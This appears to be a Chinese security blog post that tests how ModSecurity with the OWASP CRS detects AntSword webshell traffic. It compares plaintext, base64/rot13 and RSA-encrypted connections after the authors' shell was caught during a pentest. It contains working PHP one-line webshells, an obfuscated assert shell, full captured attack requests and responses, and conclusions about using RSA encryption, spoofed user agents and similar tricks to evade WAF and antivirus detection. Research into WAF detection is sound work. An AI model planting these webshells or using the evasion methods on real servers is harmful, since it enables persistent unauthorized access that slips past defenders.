WAF對WebShell流量檢測的性能分析

  • 2020 年 2 月 20 日
  • 筆記

最近在一次授權滲透測試中遇到了一個棘手的場景,萬能的隊友已經找到了後台上傳點,並傳了小馬然後開心地用antsword進行連接,但是由於明文傳輸很快被waf感知,並引起了管理員的注意,很快我們的馬被清了,真是偷雞不成蝕把米。

痛定思痛,我們判斷對方並不能儘快修復漏洞,於是臨陣抱佛腳,希望於通過加密演算法提高攻擊的品質。首先要做三件事

第一,迅速在本地復現對方環境,第二,配置多種加密組合成攻擊載荷,第三,用開源安全模組modsecurity測試攻擊載荷加密後的效果。

本地環境組建

從保留的截圖來看,對方的php版本是5.6.40,所以我要搭一個apache+php5.6.40的測試環境。打開virtualbox,鏈接複製出來一份centos鏡像系統,按照以下流程配置一遍。

1. 安裝apache

yum install -y httpd  httpd -v  Server version: Apache/2.4.6 (CentOS)  Server built:   Aug  8 2019 11:41:18

2. 安裝php5.6

yum -y install epel-release  rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm  yum -y install php56w php56w-mysql php56w-gd libjpeg* php56w-ldap php56w-odbc php56w-pear php56w-xml php56w-xmlrpc php56w-mbstring php56w-bcmath  yum -y install httpd php-gd56w php-intl56w php-mysql56w mod_ssl openssl mcrypt php5-mcrypt56w  yum -y install php56w-mcrypt php56w-soap php56w-intl  php56w-pdo  systemctl restart httpd.service  php -v    PHP 5.6.40 (cli) (built: Jan 12 2019 13:11:15)  Copyright (c) 1997-2016 The PHP Group

做一個index.php用以顯示phpinfo(),本機訪問時為了測試方便關閉firewalld

systemctl stop firewalld         //當然也可以通過firewall-cmd去開放埠
  1. 為了後面查看攻擊流量,再裝一個wireshark,包含wireshark-gnome等等,直接用*替代了。
yum install wireshark*
  1. 配置apache-modsecurity手邊沒有waf設備,沒法對流量進行測試,於是用mode-security,以及OWASP(開放Web應用程式安全性項目)核心規則集-CRS進行測試,縱然效果不如實際場景來的直觀,但足以說明問題。
yum -y install mod_security    cd /etc/httpd  git clone https://github.com/SpiderLabs/owasp-modsecurity- crs.git  mv owasp-modsecurity-crs modsecurity.d  cd modsecurity-crs  cp crs-setup.conf.example crs-setup.conf    vi /etc/httpd/conf/httpd.conf  Include conf.modules.d/*.conf  Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf  Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf  systemctl restart httpd

modsecurity的默認配置是檢測到攻擊會阻斷,我們將它改為只記錄。

vim /etc/httpd/conf.d/mod_security.conf  SecRuleEngine On (攔截)  SecRuleEngine  DetectionOnly 記錄    tail -f /var/log/httpd/model/modsec_audit.log //查看攔截日誌

測試一些攻擊向量會在log里看到記錄,證明配置完成。環境搭建完成。

攻擊流量配置、分析、檢測

明文php-webshell配置

首先寫個一句話看看明文webshell流量傳輸。

vim test1.php  <?php  @eval($_POST['aaaa']);  ?>

配置蟻劍進行連接

明文流量分析

用wireshark查看測試連接的流量

POST /test1.php HTTP/1.1  Host: 192.168.1.13  Accept-Encoding: gzip, deflate  User-Agent: antSword/v2.1  Content-Type: application/x-www-form-urlencoded  Content-Length: 993  Connection: close    aaaa=@ini_set("display_errors", "0");  @set_time_limit(0);  function asenc($out){  return $out;  };  function asoutput(){  $output=ob_get_contents();  ob_end_clean();  echo "620e2fc";  echo @asenc($output);  echo "71a0ccfbc1";  }  ob_start();  try{  $D=dirname($_SERVER["SCRIPT_FILENAME"]  //dirname()函數獲取給定文件路徑中的目錄部分,而$_SERVER['SCRIPT_FILENAME']全局預定義變數用於獲取當前執行腳本的完整路徑  );  if($D=="")  $D=dirname($_SERVER["PATH_TRANSLATED"]);  //如果沒有獲取到就用PATH_TRANSLATED,獲取當前腳本所在文件系統(非文檔根目錄)的基本路徑。這是在伺服器進行虛擬到真實路徑的映像後的結果。Apache 2 用戶可以使用httpd.conf 中的 AcceptPathInfo On 來定義 PATH_INFO。  $R="{$D}";  if(substr($D,0,1)!="/")  {  foreach(range("C","Z")as $L)  if(is_dir("{$L}:"))$R.="{$L}:";  }  else{$R.="/";}  $R.="    ";  //以上是判斷windows或者linux盤符,進而把獲取的目錄資訊存入變數  $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";  //posix_getegid()返回當前進程的有效用戶組ID,posix_geteuid()返回當前進程的有效用戶ID  $s=($u)?$u["name"]:@get_current_user();  //get_current_user()方法進行獲得PHP當前腳本所有者名稱  $R.=php_uname();  //php_uname返回運行 PHP 的系統的有關資訊  $R.="{$s}";  echo $R;;}  catch(Exception $e)  {echo "ERROR://".$e->getMessage();}  ;  asoutput();  die();//輸出  HTTP/1.1 200 OK  Date: Wed, 29 Jan 2020 12:53:30 GMT  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40  X-Powered-By: PHP/5.6.40  Content-Length: 136  Connection: close  Content-Type: text/html; charset=UTF-8  620e2fc/var/www/html./.Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64.apache71a0ccfbc1

為了更加清楚antsword發出的流量包,我認真看了一下發的包,並查了一些相關函數,做注釋的同時感嘆了PHP函數的牛逼,並勾起了我的好奇心,對這幾個函數做了本地測試。

<?php  echo posix_getegid();  echo posix_getlogin();  echo get_current_user();  echo php_uname();
0  t1ger  root  Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64

果然牛逼!和返回包現象保持了一致。同時也說明了如果明文直接進行探測,這種流量在waf面前無異於自投羅網!

明文流量檢測

waf測試結果如下:

Message: Warning. Pattern match "^[\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "708"] [id "920350"] [msg "Host header is a numeric IP address"] [data "192.168.1.13"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]  Message: Warning.      .....      .....  Apache-Handler: php5-script  Stopwatch: 1580358081210887 7750 (- - -)  Stopwatch2: 1580358081210887 7750; combined=5379, p1=753, p2=4202, p3=42, p4=155, p5=227, sr=194, sw=0, l=0, gc=0  Response-Body-Transformed: Dechunked  Producer: ModSecurity for Apache/2.9.2 (http://www.modsecurity.org/); OWASP_CRS/3.2.0.  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40  Engine-Mode: "DETECTION_ONLY"

統計數據如下,匹配規則數按照grep line|wc -l計算

Apache-Error

Message

匹配規則數

level

11

11

22

3

接下來我們先測對稱密碼。

Base64&&rot13 webshell配置

Antsword自帶幾個可供測試的shell,給我們提供了非常大的方便。

我順便貼一下程式碼。先來看看base64的程式碼

<?php  $ant=base64_decode("YXNzZXJ0");  $ant($_POST['ant']);  ?>

Base64&&rot13 流量分析

POST /php_assert_script.php HTTP/1.1  Host: 192.168.1.13  Accept-Encoding: gzip, deflate  User-Agent: antSword/v2.1  Content-Type: application/x-www-form-urlencoded  Content-Length: 942  Connection: close    ant=%40eval(%40base64_decode(%24_POST%5Bq9c4fa426fb243%5D))%3B&q9c4fa426fb243=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMzRhZTE3IjtlY2hvIEBhc2VuYygkb3V0cHV0KTtlY2hvICI1YmJhN2YiO31vYl9zdGFydCgpO3RyeXskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfQkiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkMiLCJaIilhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fWVsc2V7JFIuPSIvIjt9JFIuPSIJIjskdT0oZnVuY3Rpb25fZXhpc3RzKCJwb3NpeF9nZXRlZ2lkIikpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKToiIjskcz0oJHUpPyR1WyJuYW1lIl06QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIJeyRzfSI7ZWNobyAkUjs7fWNhdGNoKEV4Y2VwdGlvbiAkZSl7ZWNobyAiRVJST1I6Ly8iLiRlLT5nZXRNZXNzYWdlKCk7fTthc291dHB1dCgpO2RpZSgpOw%3D%3D

base64加密之後的流量除了eval之外至少不會包含那麼多的高危函數,加密之後我們再來測試。

Base64&&rot13 webshell流量檢測

waf測試結果如下:

Message: Warning. Pattern match "^[\d.:]+$" at REQUEST_HEADERS:Host. [file  Message: Warning. Matched phrase "base64_decode" at ARGS:ant. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "301"] [id "933150"] [msg "PHP Injection Attack: High-Risk PHP Function Name Found"] [data "Matched Data: base64_decode found within ARGS:ant: @eval(@base64_decode($_post[y07ae431d0730c]));"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"]  ...  ...

統計數據如下

Apache-Error

Message

匹配規則數

level

7

7

14

3

通過Antsword介面配置rot13加密及解密,抓包看了下流量,僅僅是將base64的加密函數變成了str_rot13

ant=%40eval(%40base64_decode -> ant=%40eval(%40str_rot13(

攔截數據和base差不多,waf統計數據如下

Apache-Error

Message

匹配規則數

level

10

7

14

3

由此可見,對稱加密演算法下eval、base64,rot13這些函數也是可以觸發較高告警等級的。但是相比於明文傳輸,觸發的告警會少一半,於是筆者進一步嘗試一下antsword提供的非對稱加密演算法。

RSA加密流量配置

版本>=2.1.0開始,Antsword作者新增了RSA模式。蟻劍默認下僅支援PHP。另外需要Server開啟php_openssl拓展。

修改php.ini,去掉extension=php_openssl.dll前的注釋,重啟Apache

使用方法:

Antsword->系統設置->編碼管理->新建編碼器->PHP RSA->命名為rsa_php->點擊RSA配置->生成

1、將下方的php程式碼copy到虛擬機里,命名為rsa.php

2、配置antsword連接類型選擇rsa_php

3、測試連接

RSA加密流量分析

貼上wireshark抓的流量

POST /rsa.php HTTP/1.1Host: 192.168.1.13Accept-Encoding: gzip, deflateUser-Agent: antSword/v2.1Content-Type: application/x-www-form-urlencodedContent-Length: 1712Connection: closeant=W%2B9beN7Ltke390bzZGS5JbOBCnO8SRXW6Z8w0WaMF6CdAymaCu6NeWE9FX0kyCFs3jaLkDWkEvcTsSC2gEu85l5ugsVJUK6bTWFlVNeRBoezjTjUJZdjGvnjrxjd5Pn4iZaRjoaxAZPeZP2ozupbevWFUId4ZzkKZ7bIVPrZKk4%3D%7CYjt1kz5Gkj2N6Ajkqp3VXcg%2FEA7emPXV6oyTwZAZS9Ux1%2Fpby5PIuU9LsMZmGlMqGXvRFO23is9MUJpF66yboIAIYqpGRJCDgSP4S%2BfG6DD0lRYGEOIEsfpaLSVMhxZtR6OnFXp%2FfbXqmgGUk0a8HCUfQ83XmXS%2BRsl0Yx2PFc4%3D%7CAWtIrpychlQENib6basrK89LJcjnKk%2Bf5mVM72MOnPHxaviQFXws2TKNdGPI4SI9%2Fkwl%2FUGqB22s6NOwCza1f%2BkzGK7FqEciITMZMNFbokFsmjG8IiWkRO%2B%2BbWWnsMesfavJub9aEln41x8U97WjgKGKMMdqXZHrIRS4KU8pQhU%3D%7CXLL0DnlWOLx3hNXd2VGzmbdcgmtQoiyiiPNQCiBkAbUK1mLM14l6f22Pkl2tSSw%2F9dYIkdZ91wUok9GHDBMmKkL6D%2BJGQxrJDyQXEfytOzfzZmKqp%2BJ%2BryVm2zwLJMXTdpZ%2BUsBWgVzlD%2Bxga6%2F7rCqkG%2FtaWM6e%2BGegcS4lWTE%3D%7CJGJR50q4jSkL028qffvT%2Be%2BnJcMQth6jz86sntyuI3GZQUtjS5%2FoCByIqsGi8zPwCKS0J%2FAEiEGhAwN7%2FBQXYjyVWAs5VpDhPrVUs7EbqFgllVmrNt8T5Rt7O%2FCHVSiR2AQjyG%2BxB1LjO5ElX%2FH8Pfh25dDpVaFt3MEr1lxT69I%3D%7CSIirF52ZEhs%2FMBfco2kWouurB%2F%2FhCvLG29%2BK70a6t8Io%2FE%2F7VL5IO38s2j%2Bjq%2BSw6dUDL9cEUbEx2G2U4r0fHiDSYPbbn9WS6FbQSCPHxG6lxLHCXmmkKxj%2B2P8khyMM%2FHdVCWai%2B5L5hXYr%2BUWFkCkbv%2BUyYUSsfL29sGxWeVA%3D%7Ci1qZBSL6Dfu31cisSj3J%2BY7epLuQl62DdEWMCiZRQOz5AHFsPFsWtO59uedRC0CfMOhcbIDGGq2GNThL8VPz%2FUfLJTd3kuoFo7p225iPcYOKJS75V36ccHw3bMI3LOWcEhUF3LPX2YcaLSvwDDyHfrnWL2Qj6VmQKew8edoAIdU%3D%7CkJih3pPT70J6BiPll9o4PtH%2Byl%2BmB8%2BUPDAS%2FfAu4uzi2yDMCIdzdkaFLlnsUKewHXLf1mWWVpGkfqLCttgZed9wUtl6N22C3nQGZqZ%2FqnNiKeBYK0%2FJBmimOAf7nSMB1WF%2Bab5RmRq6cSSwrWc4ya93kVJzmIg1BdyaiycdN5I%3D%7CHV2y7vs6wQUIQ8DnvveCeD8xtjRecf%2F%2B7rAl7Y4Wa8S4Y0onKYHOz2Nz0hgBJtFN%2BLRIj9%2B%2FYyOq%2Fslq0XW%2BolQCUl5hf8%2F3Y9OmlxKvSCGf3A0IIAquqSaJXpU4w8rqVyP9Od2bgDXDzsOx8YgVdigeyZxLS0TNNODTGIATb7Y%3DHTTP/1.1 200 OKDate: Thu, 30 Jan 2020 05:47:09 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40X-Powered-By: PHP/5.6.40Content-Length: 133Connection: closeContent-Type: text/html; charset=UTF-88ee773/var/www/html./.Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64.apache47970246

經歷非對稱加密演算法之後,整個流量傳輸的數據除了length之外,肉眼已經分別不出來, 這個效果筆者比較滿意.

RSA加密流量檢測

Message: Warning. Pattern match "^[\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "708"] [id "920350"] [msg "Host header is a numeric IP address"] [data "192.168.1.13"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]Apache-Handler: php5-scriptStopwatch: 1580363229118571 7666 (- - -)Stopwatch2: 1580363229118571 7666; combined=6153, p1=574, p2=5170, p3=39, p4=156, p5=213, sr=205, sw=1, l=0, gc=0Response-Body-Transformed: DechunkedProducer: ModSecurity for Apache/2.9.2 (http://www.modsecurity.org/); OWASP_CRS/3.2.0.Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Engine-Mode: "DETECTION_ONLY"
| Apache-Error | Message | 匹配規則數 | level || ------------ | ------- | ---------- | ----- || 1            | 1       | 1          | --    |

waf也只能檢測到Host header is a numeric IP address,這基本是說waf對於RSA加密的webshell流量基本沒什麼防護能力,往後的安全設備檢測只能依賴於殺毒軟體。

這樣的加密程度對筆者本次實驗來說已經夠用了。但是同樣還存在著很多很多的問題,比如繞殺軟,混淆程式碼等等,每一個方向都需要專註、細心、長久的投入。

PS:隱藏攻擊流量也可以通過改UA,設置multi發包,花樣過狗過盾甚至過人等等。過狗千萬條,安全第一條,連馬不謹慎,隊友兩行淚。

參考鏈接: http://www.test666.me/archives/289/ https://www.cnblogs.com/jianmingyuan/p/5900064.html

*本文作者:LittleT1ger,轉載請註明來自FreeBuf.COM

VirMach 便宜 VPS

QNews

QNews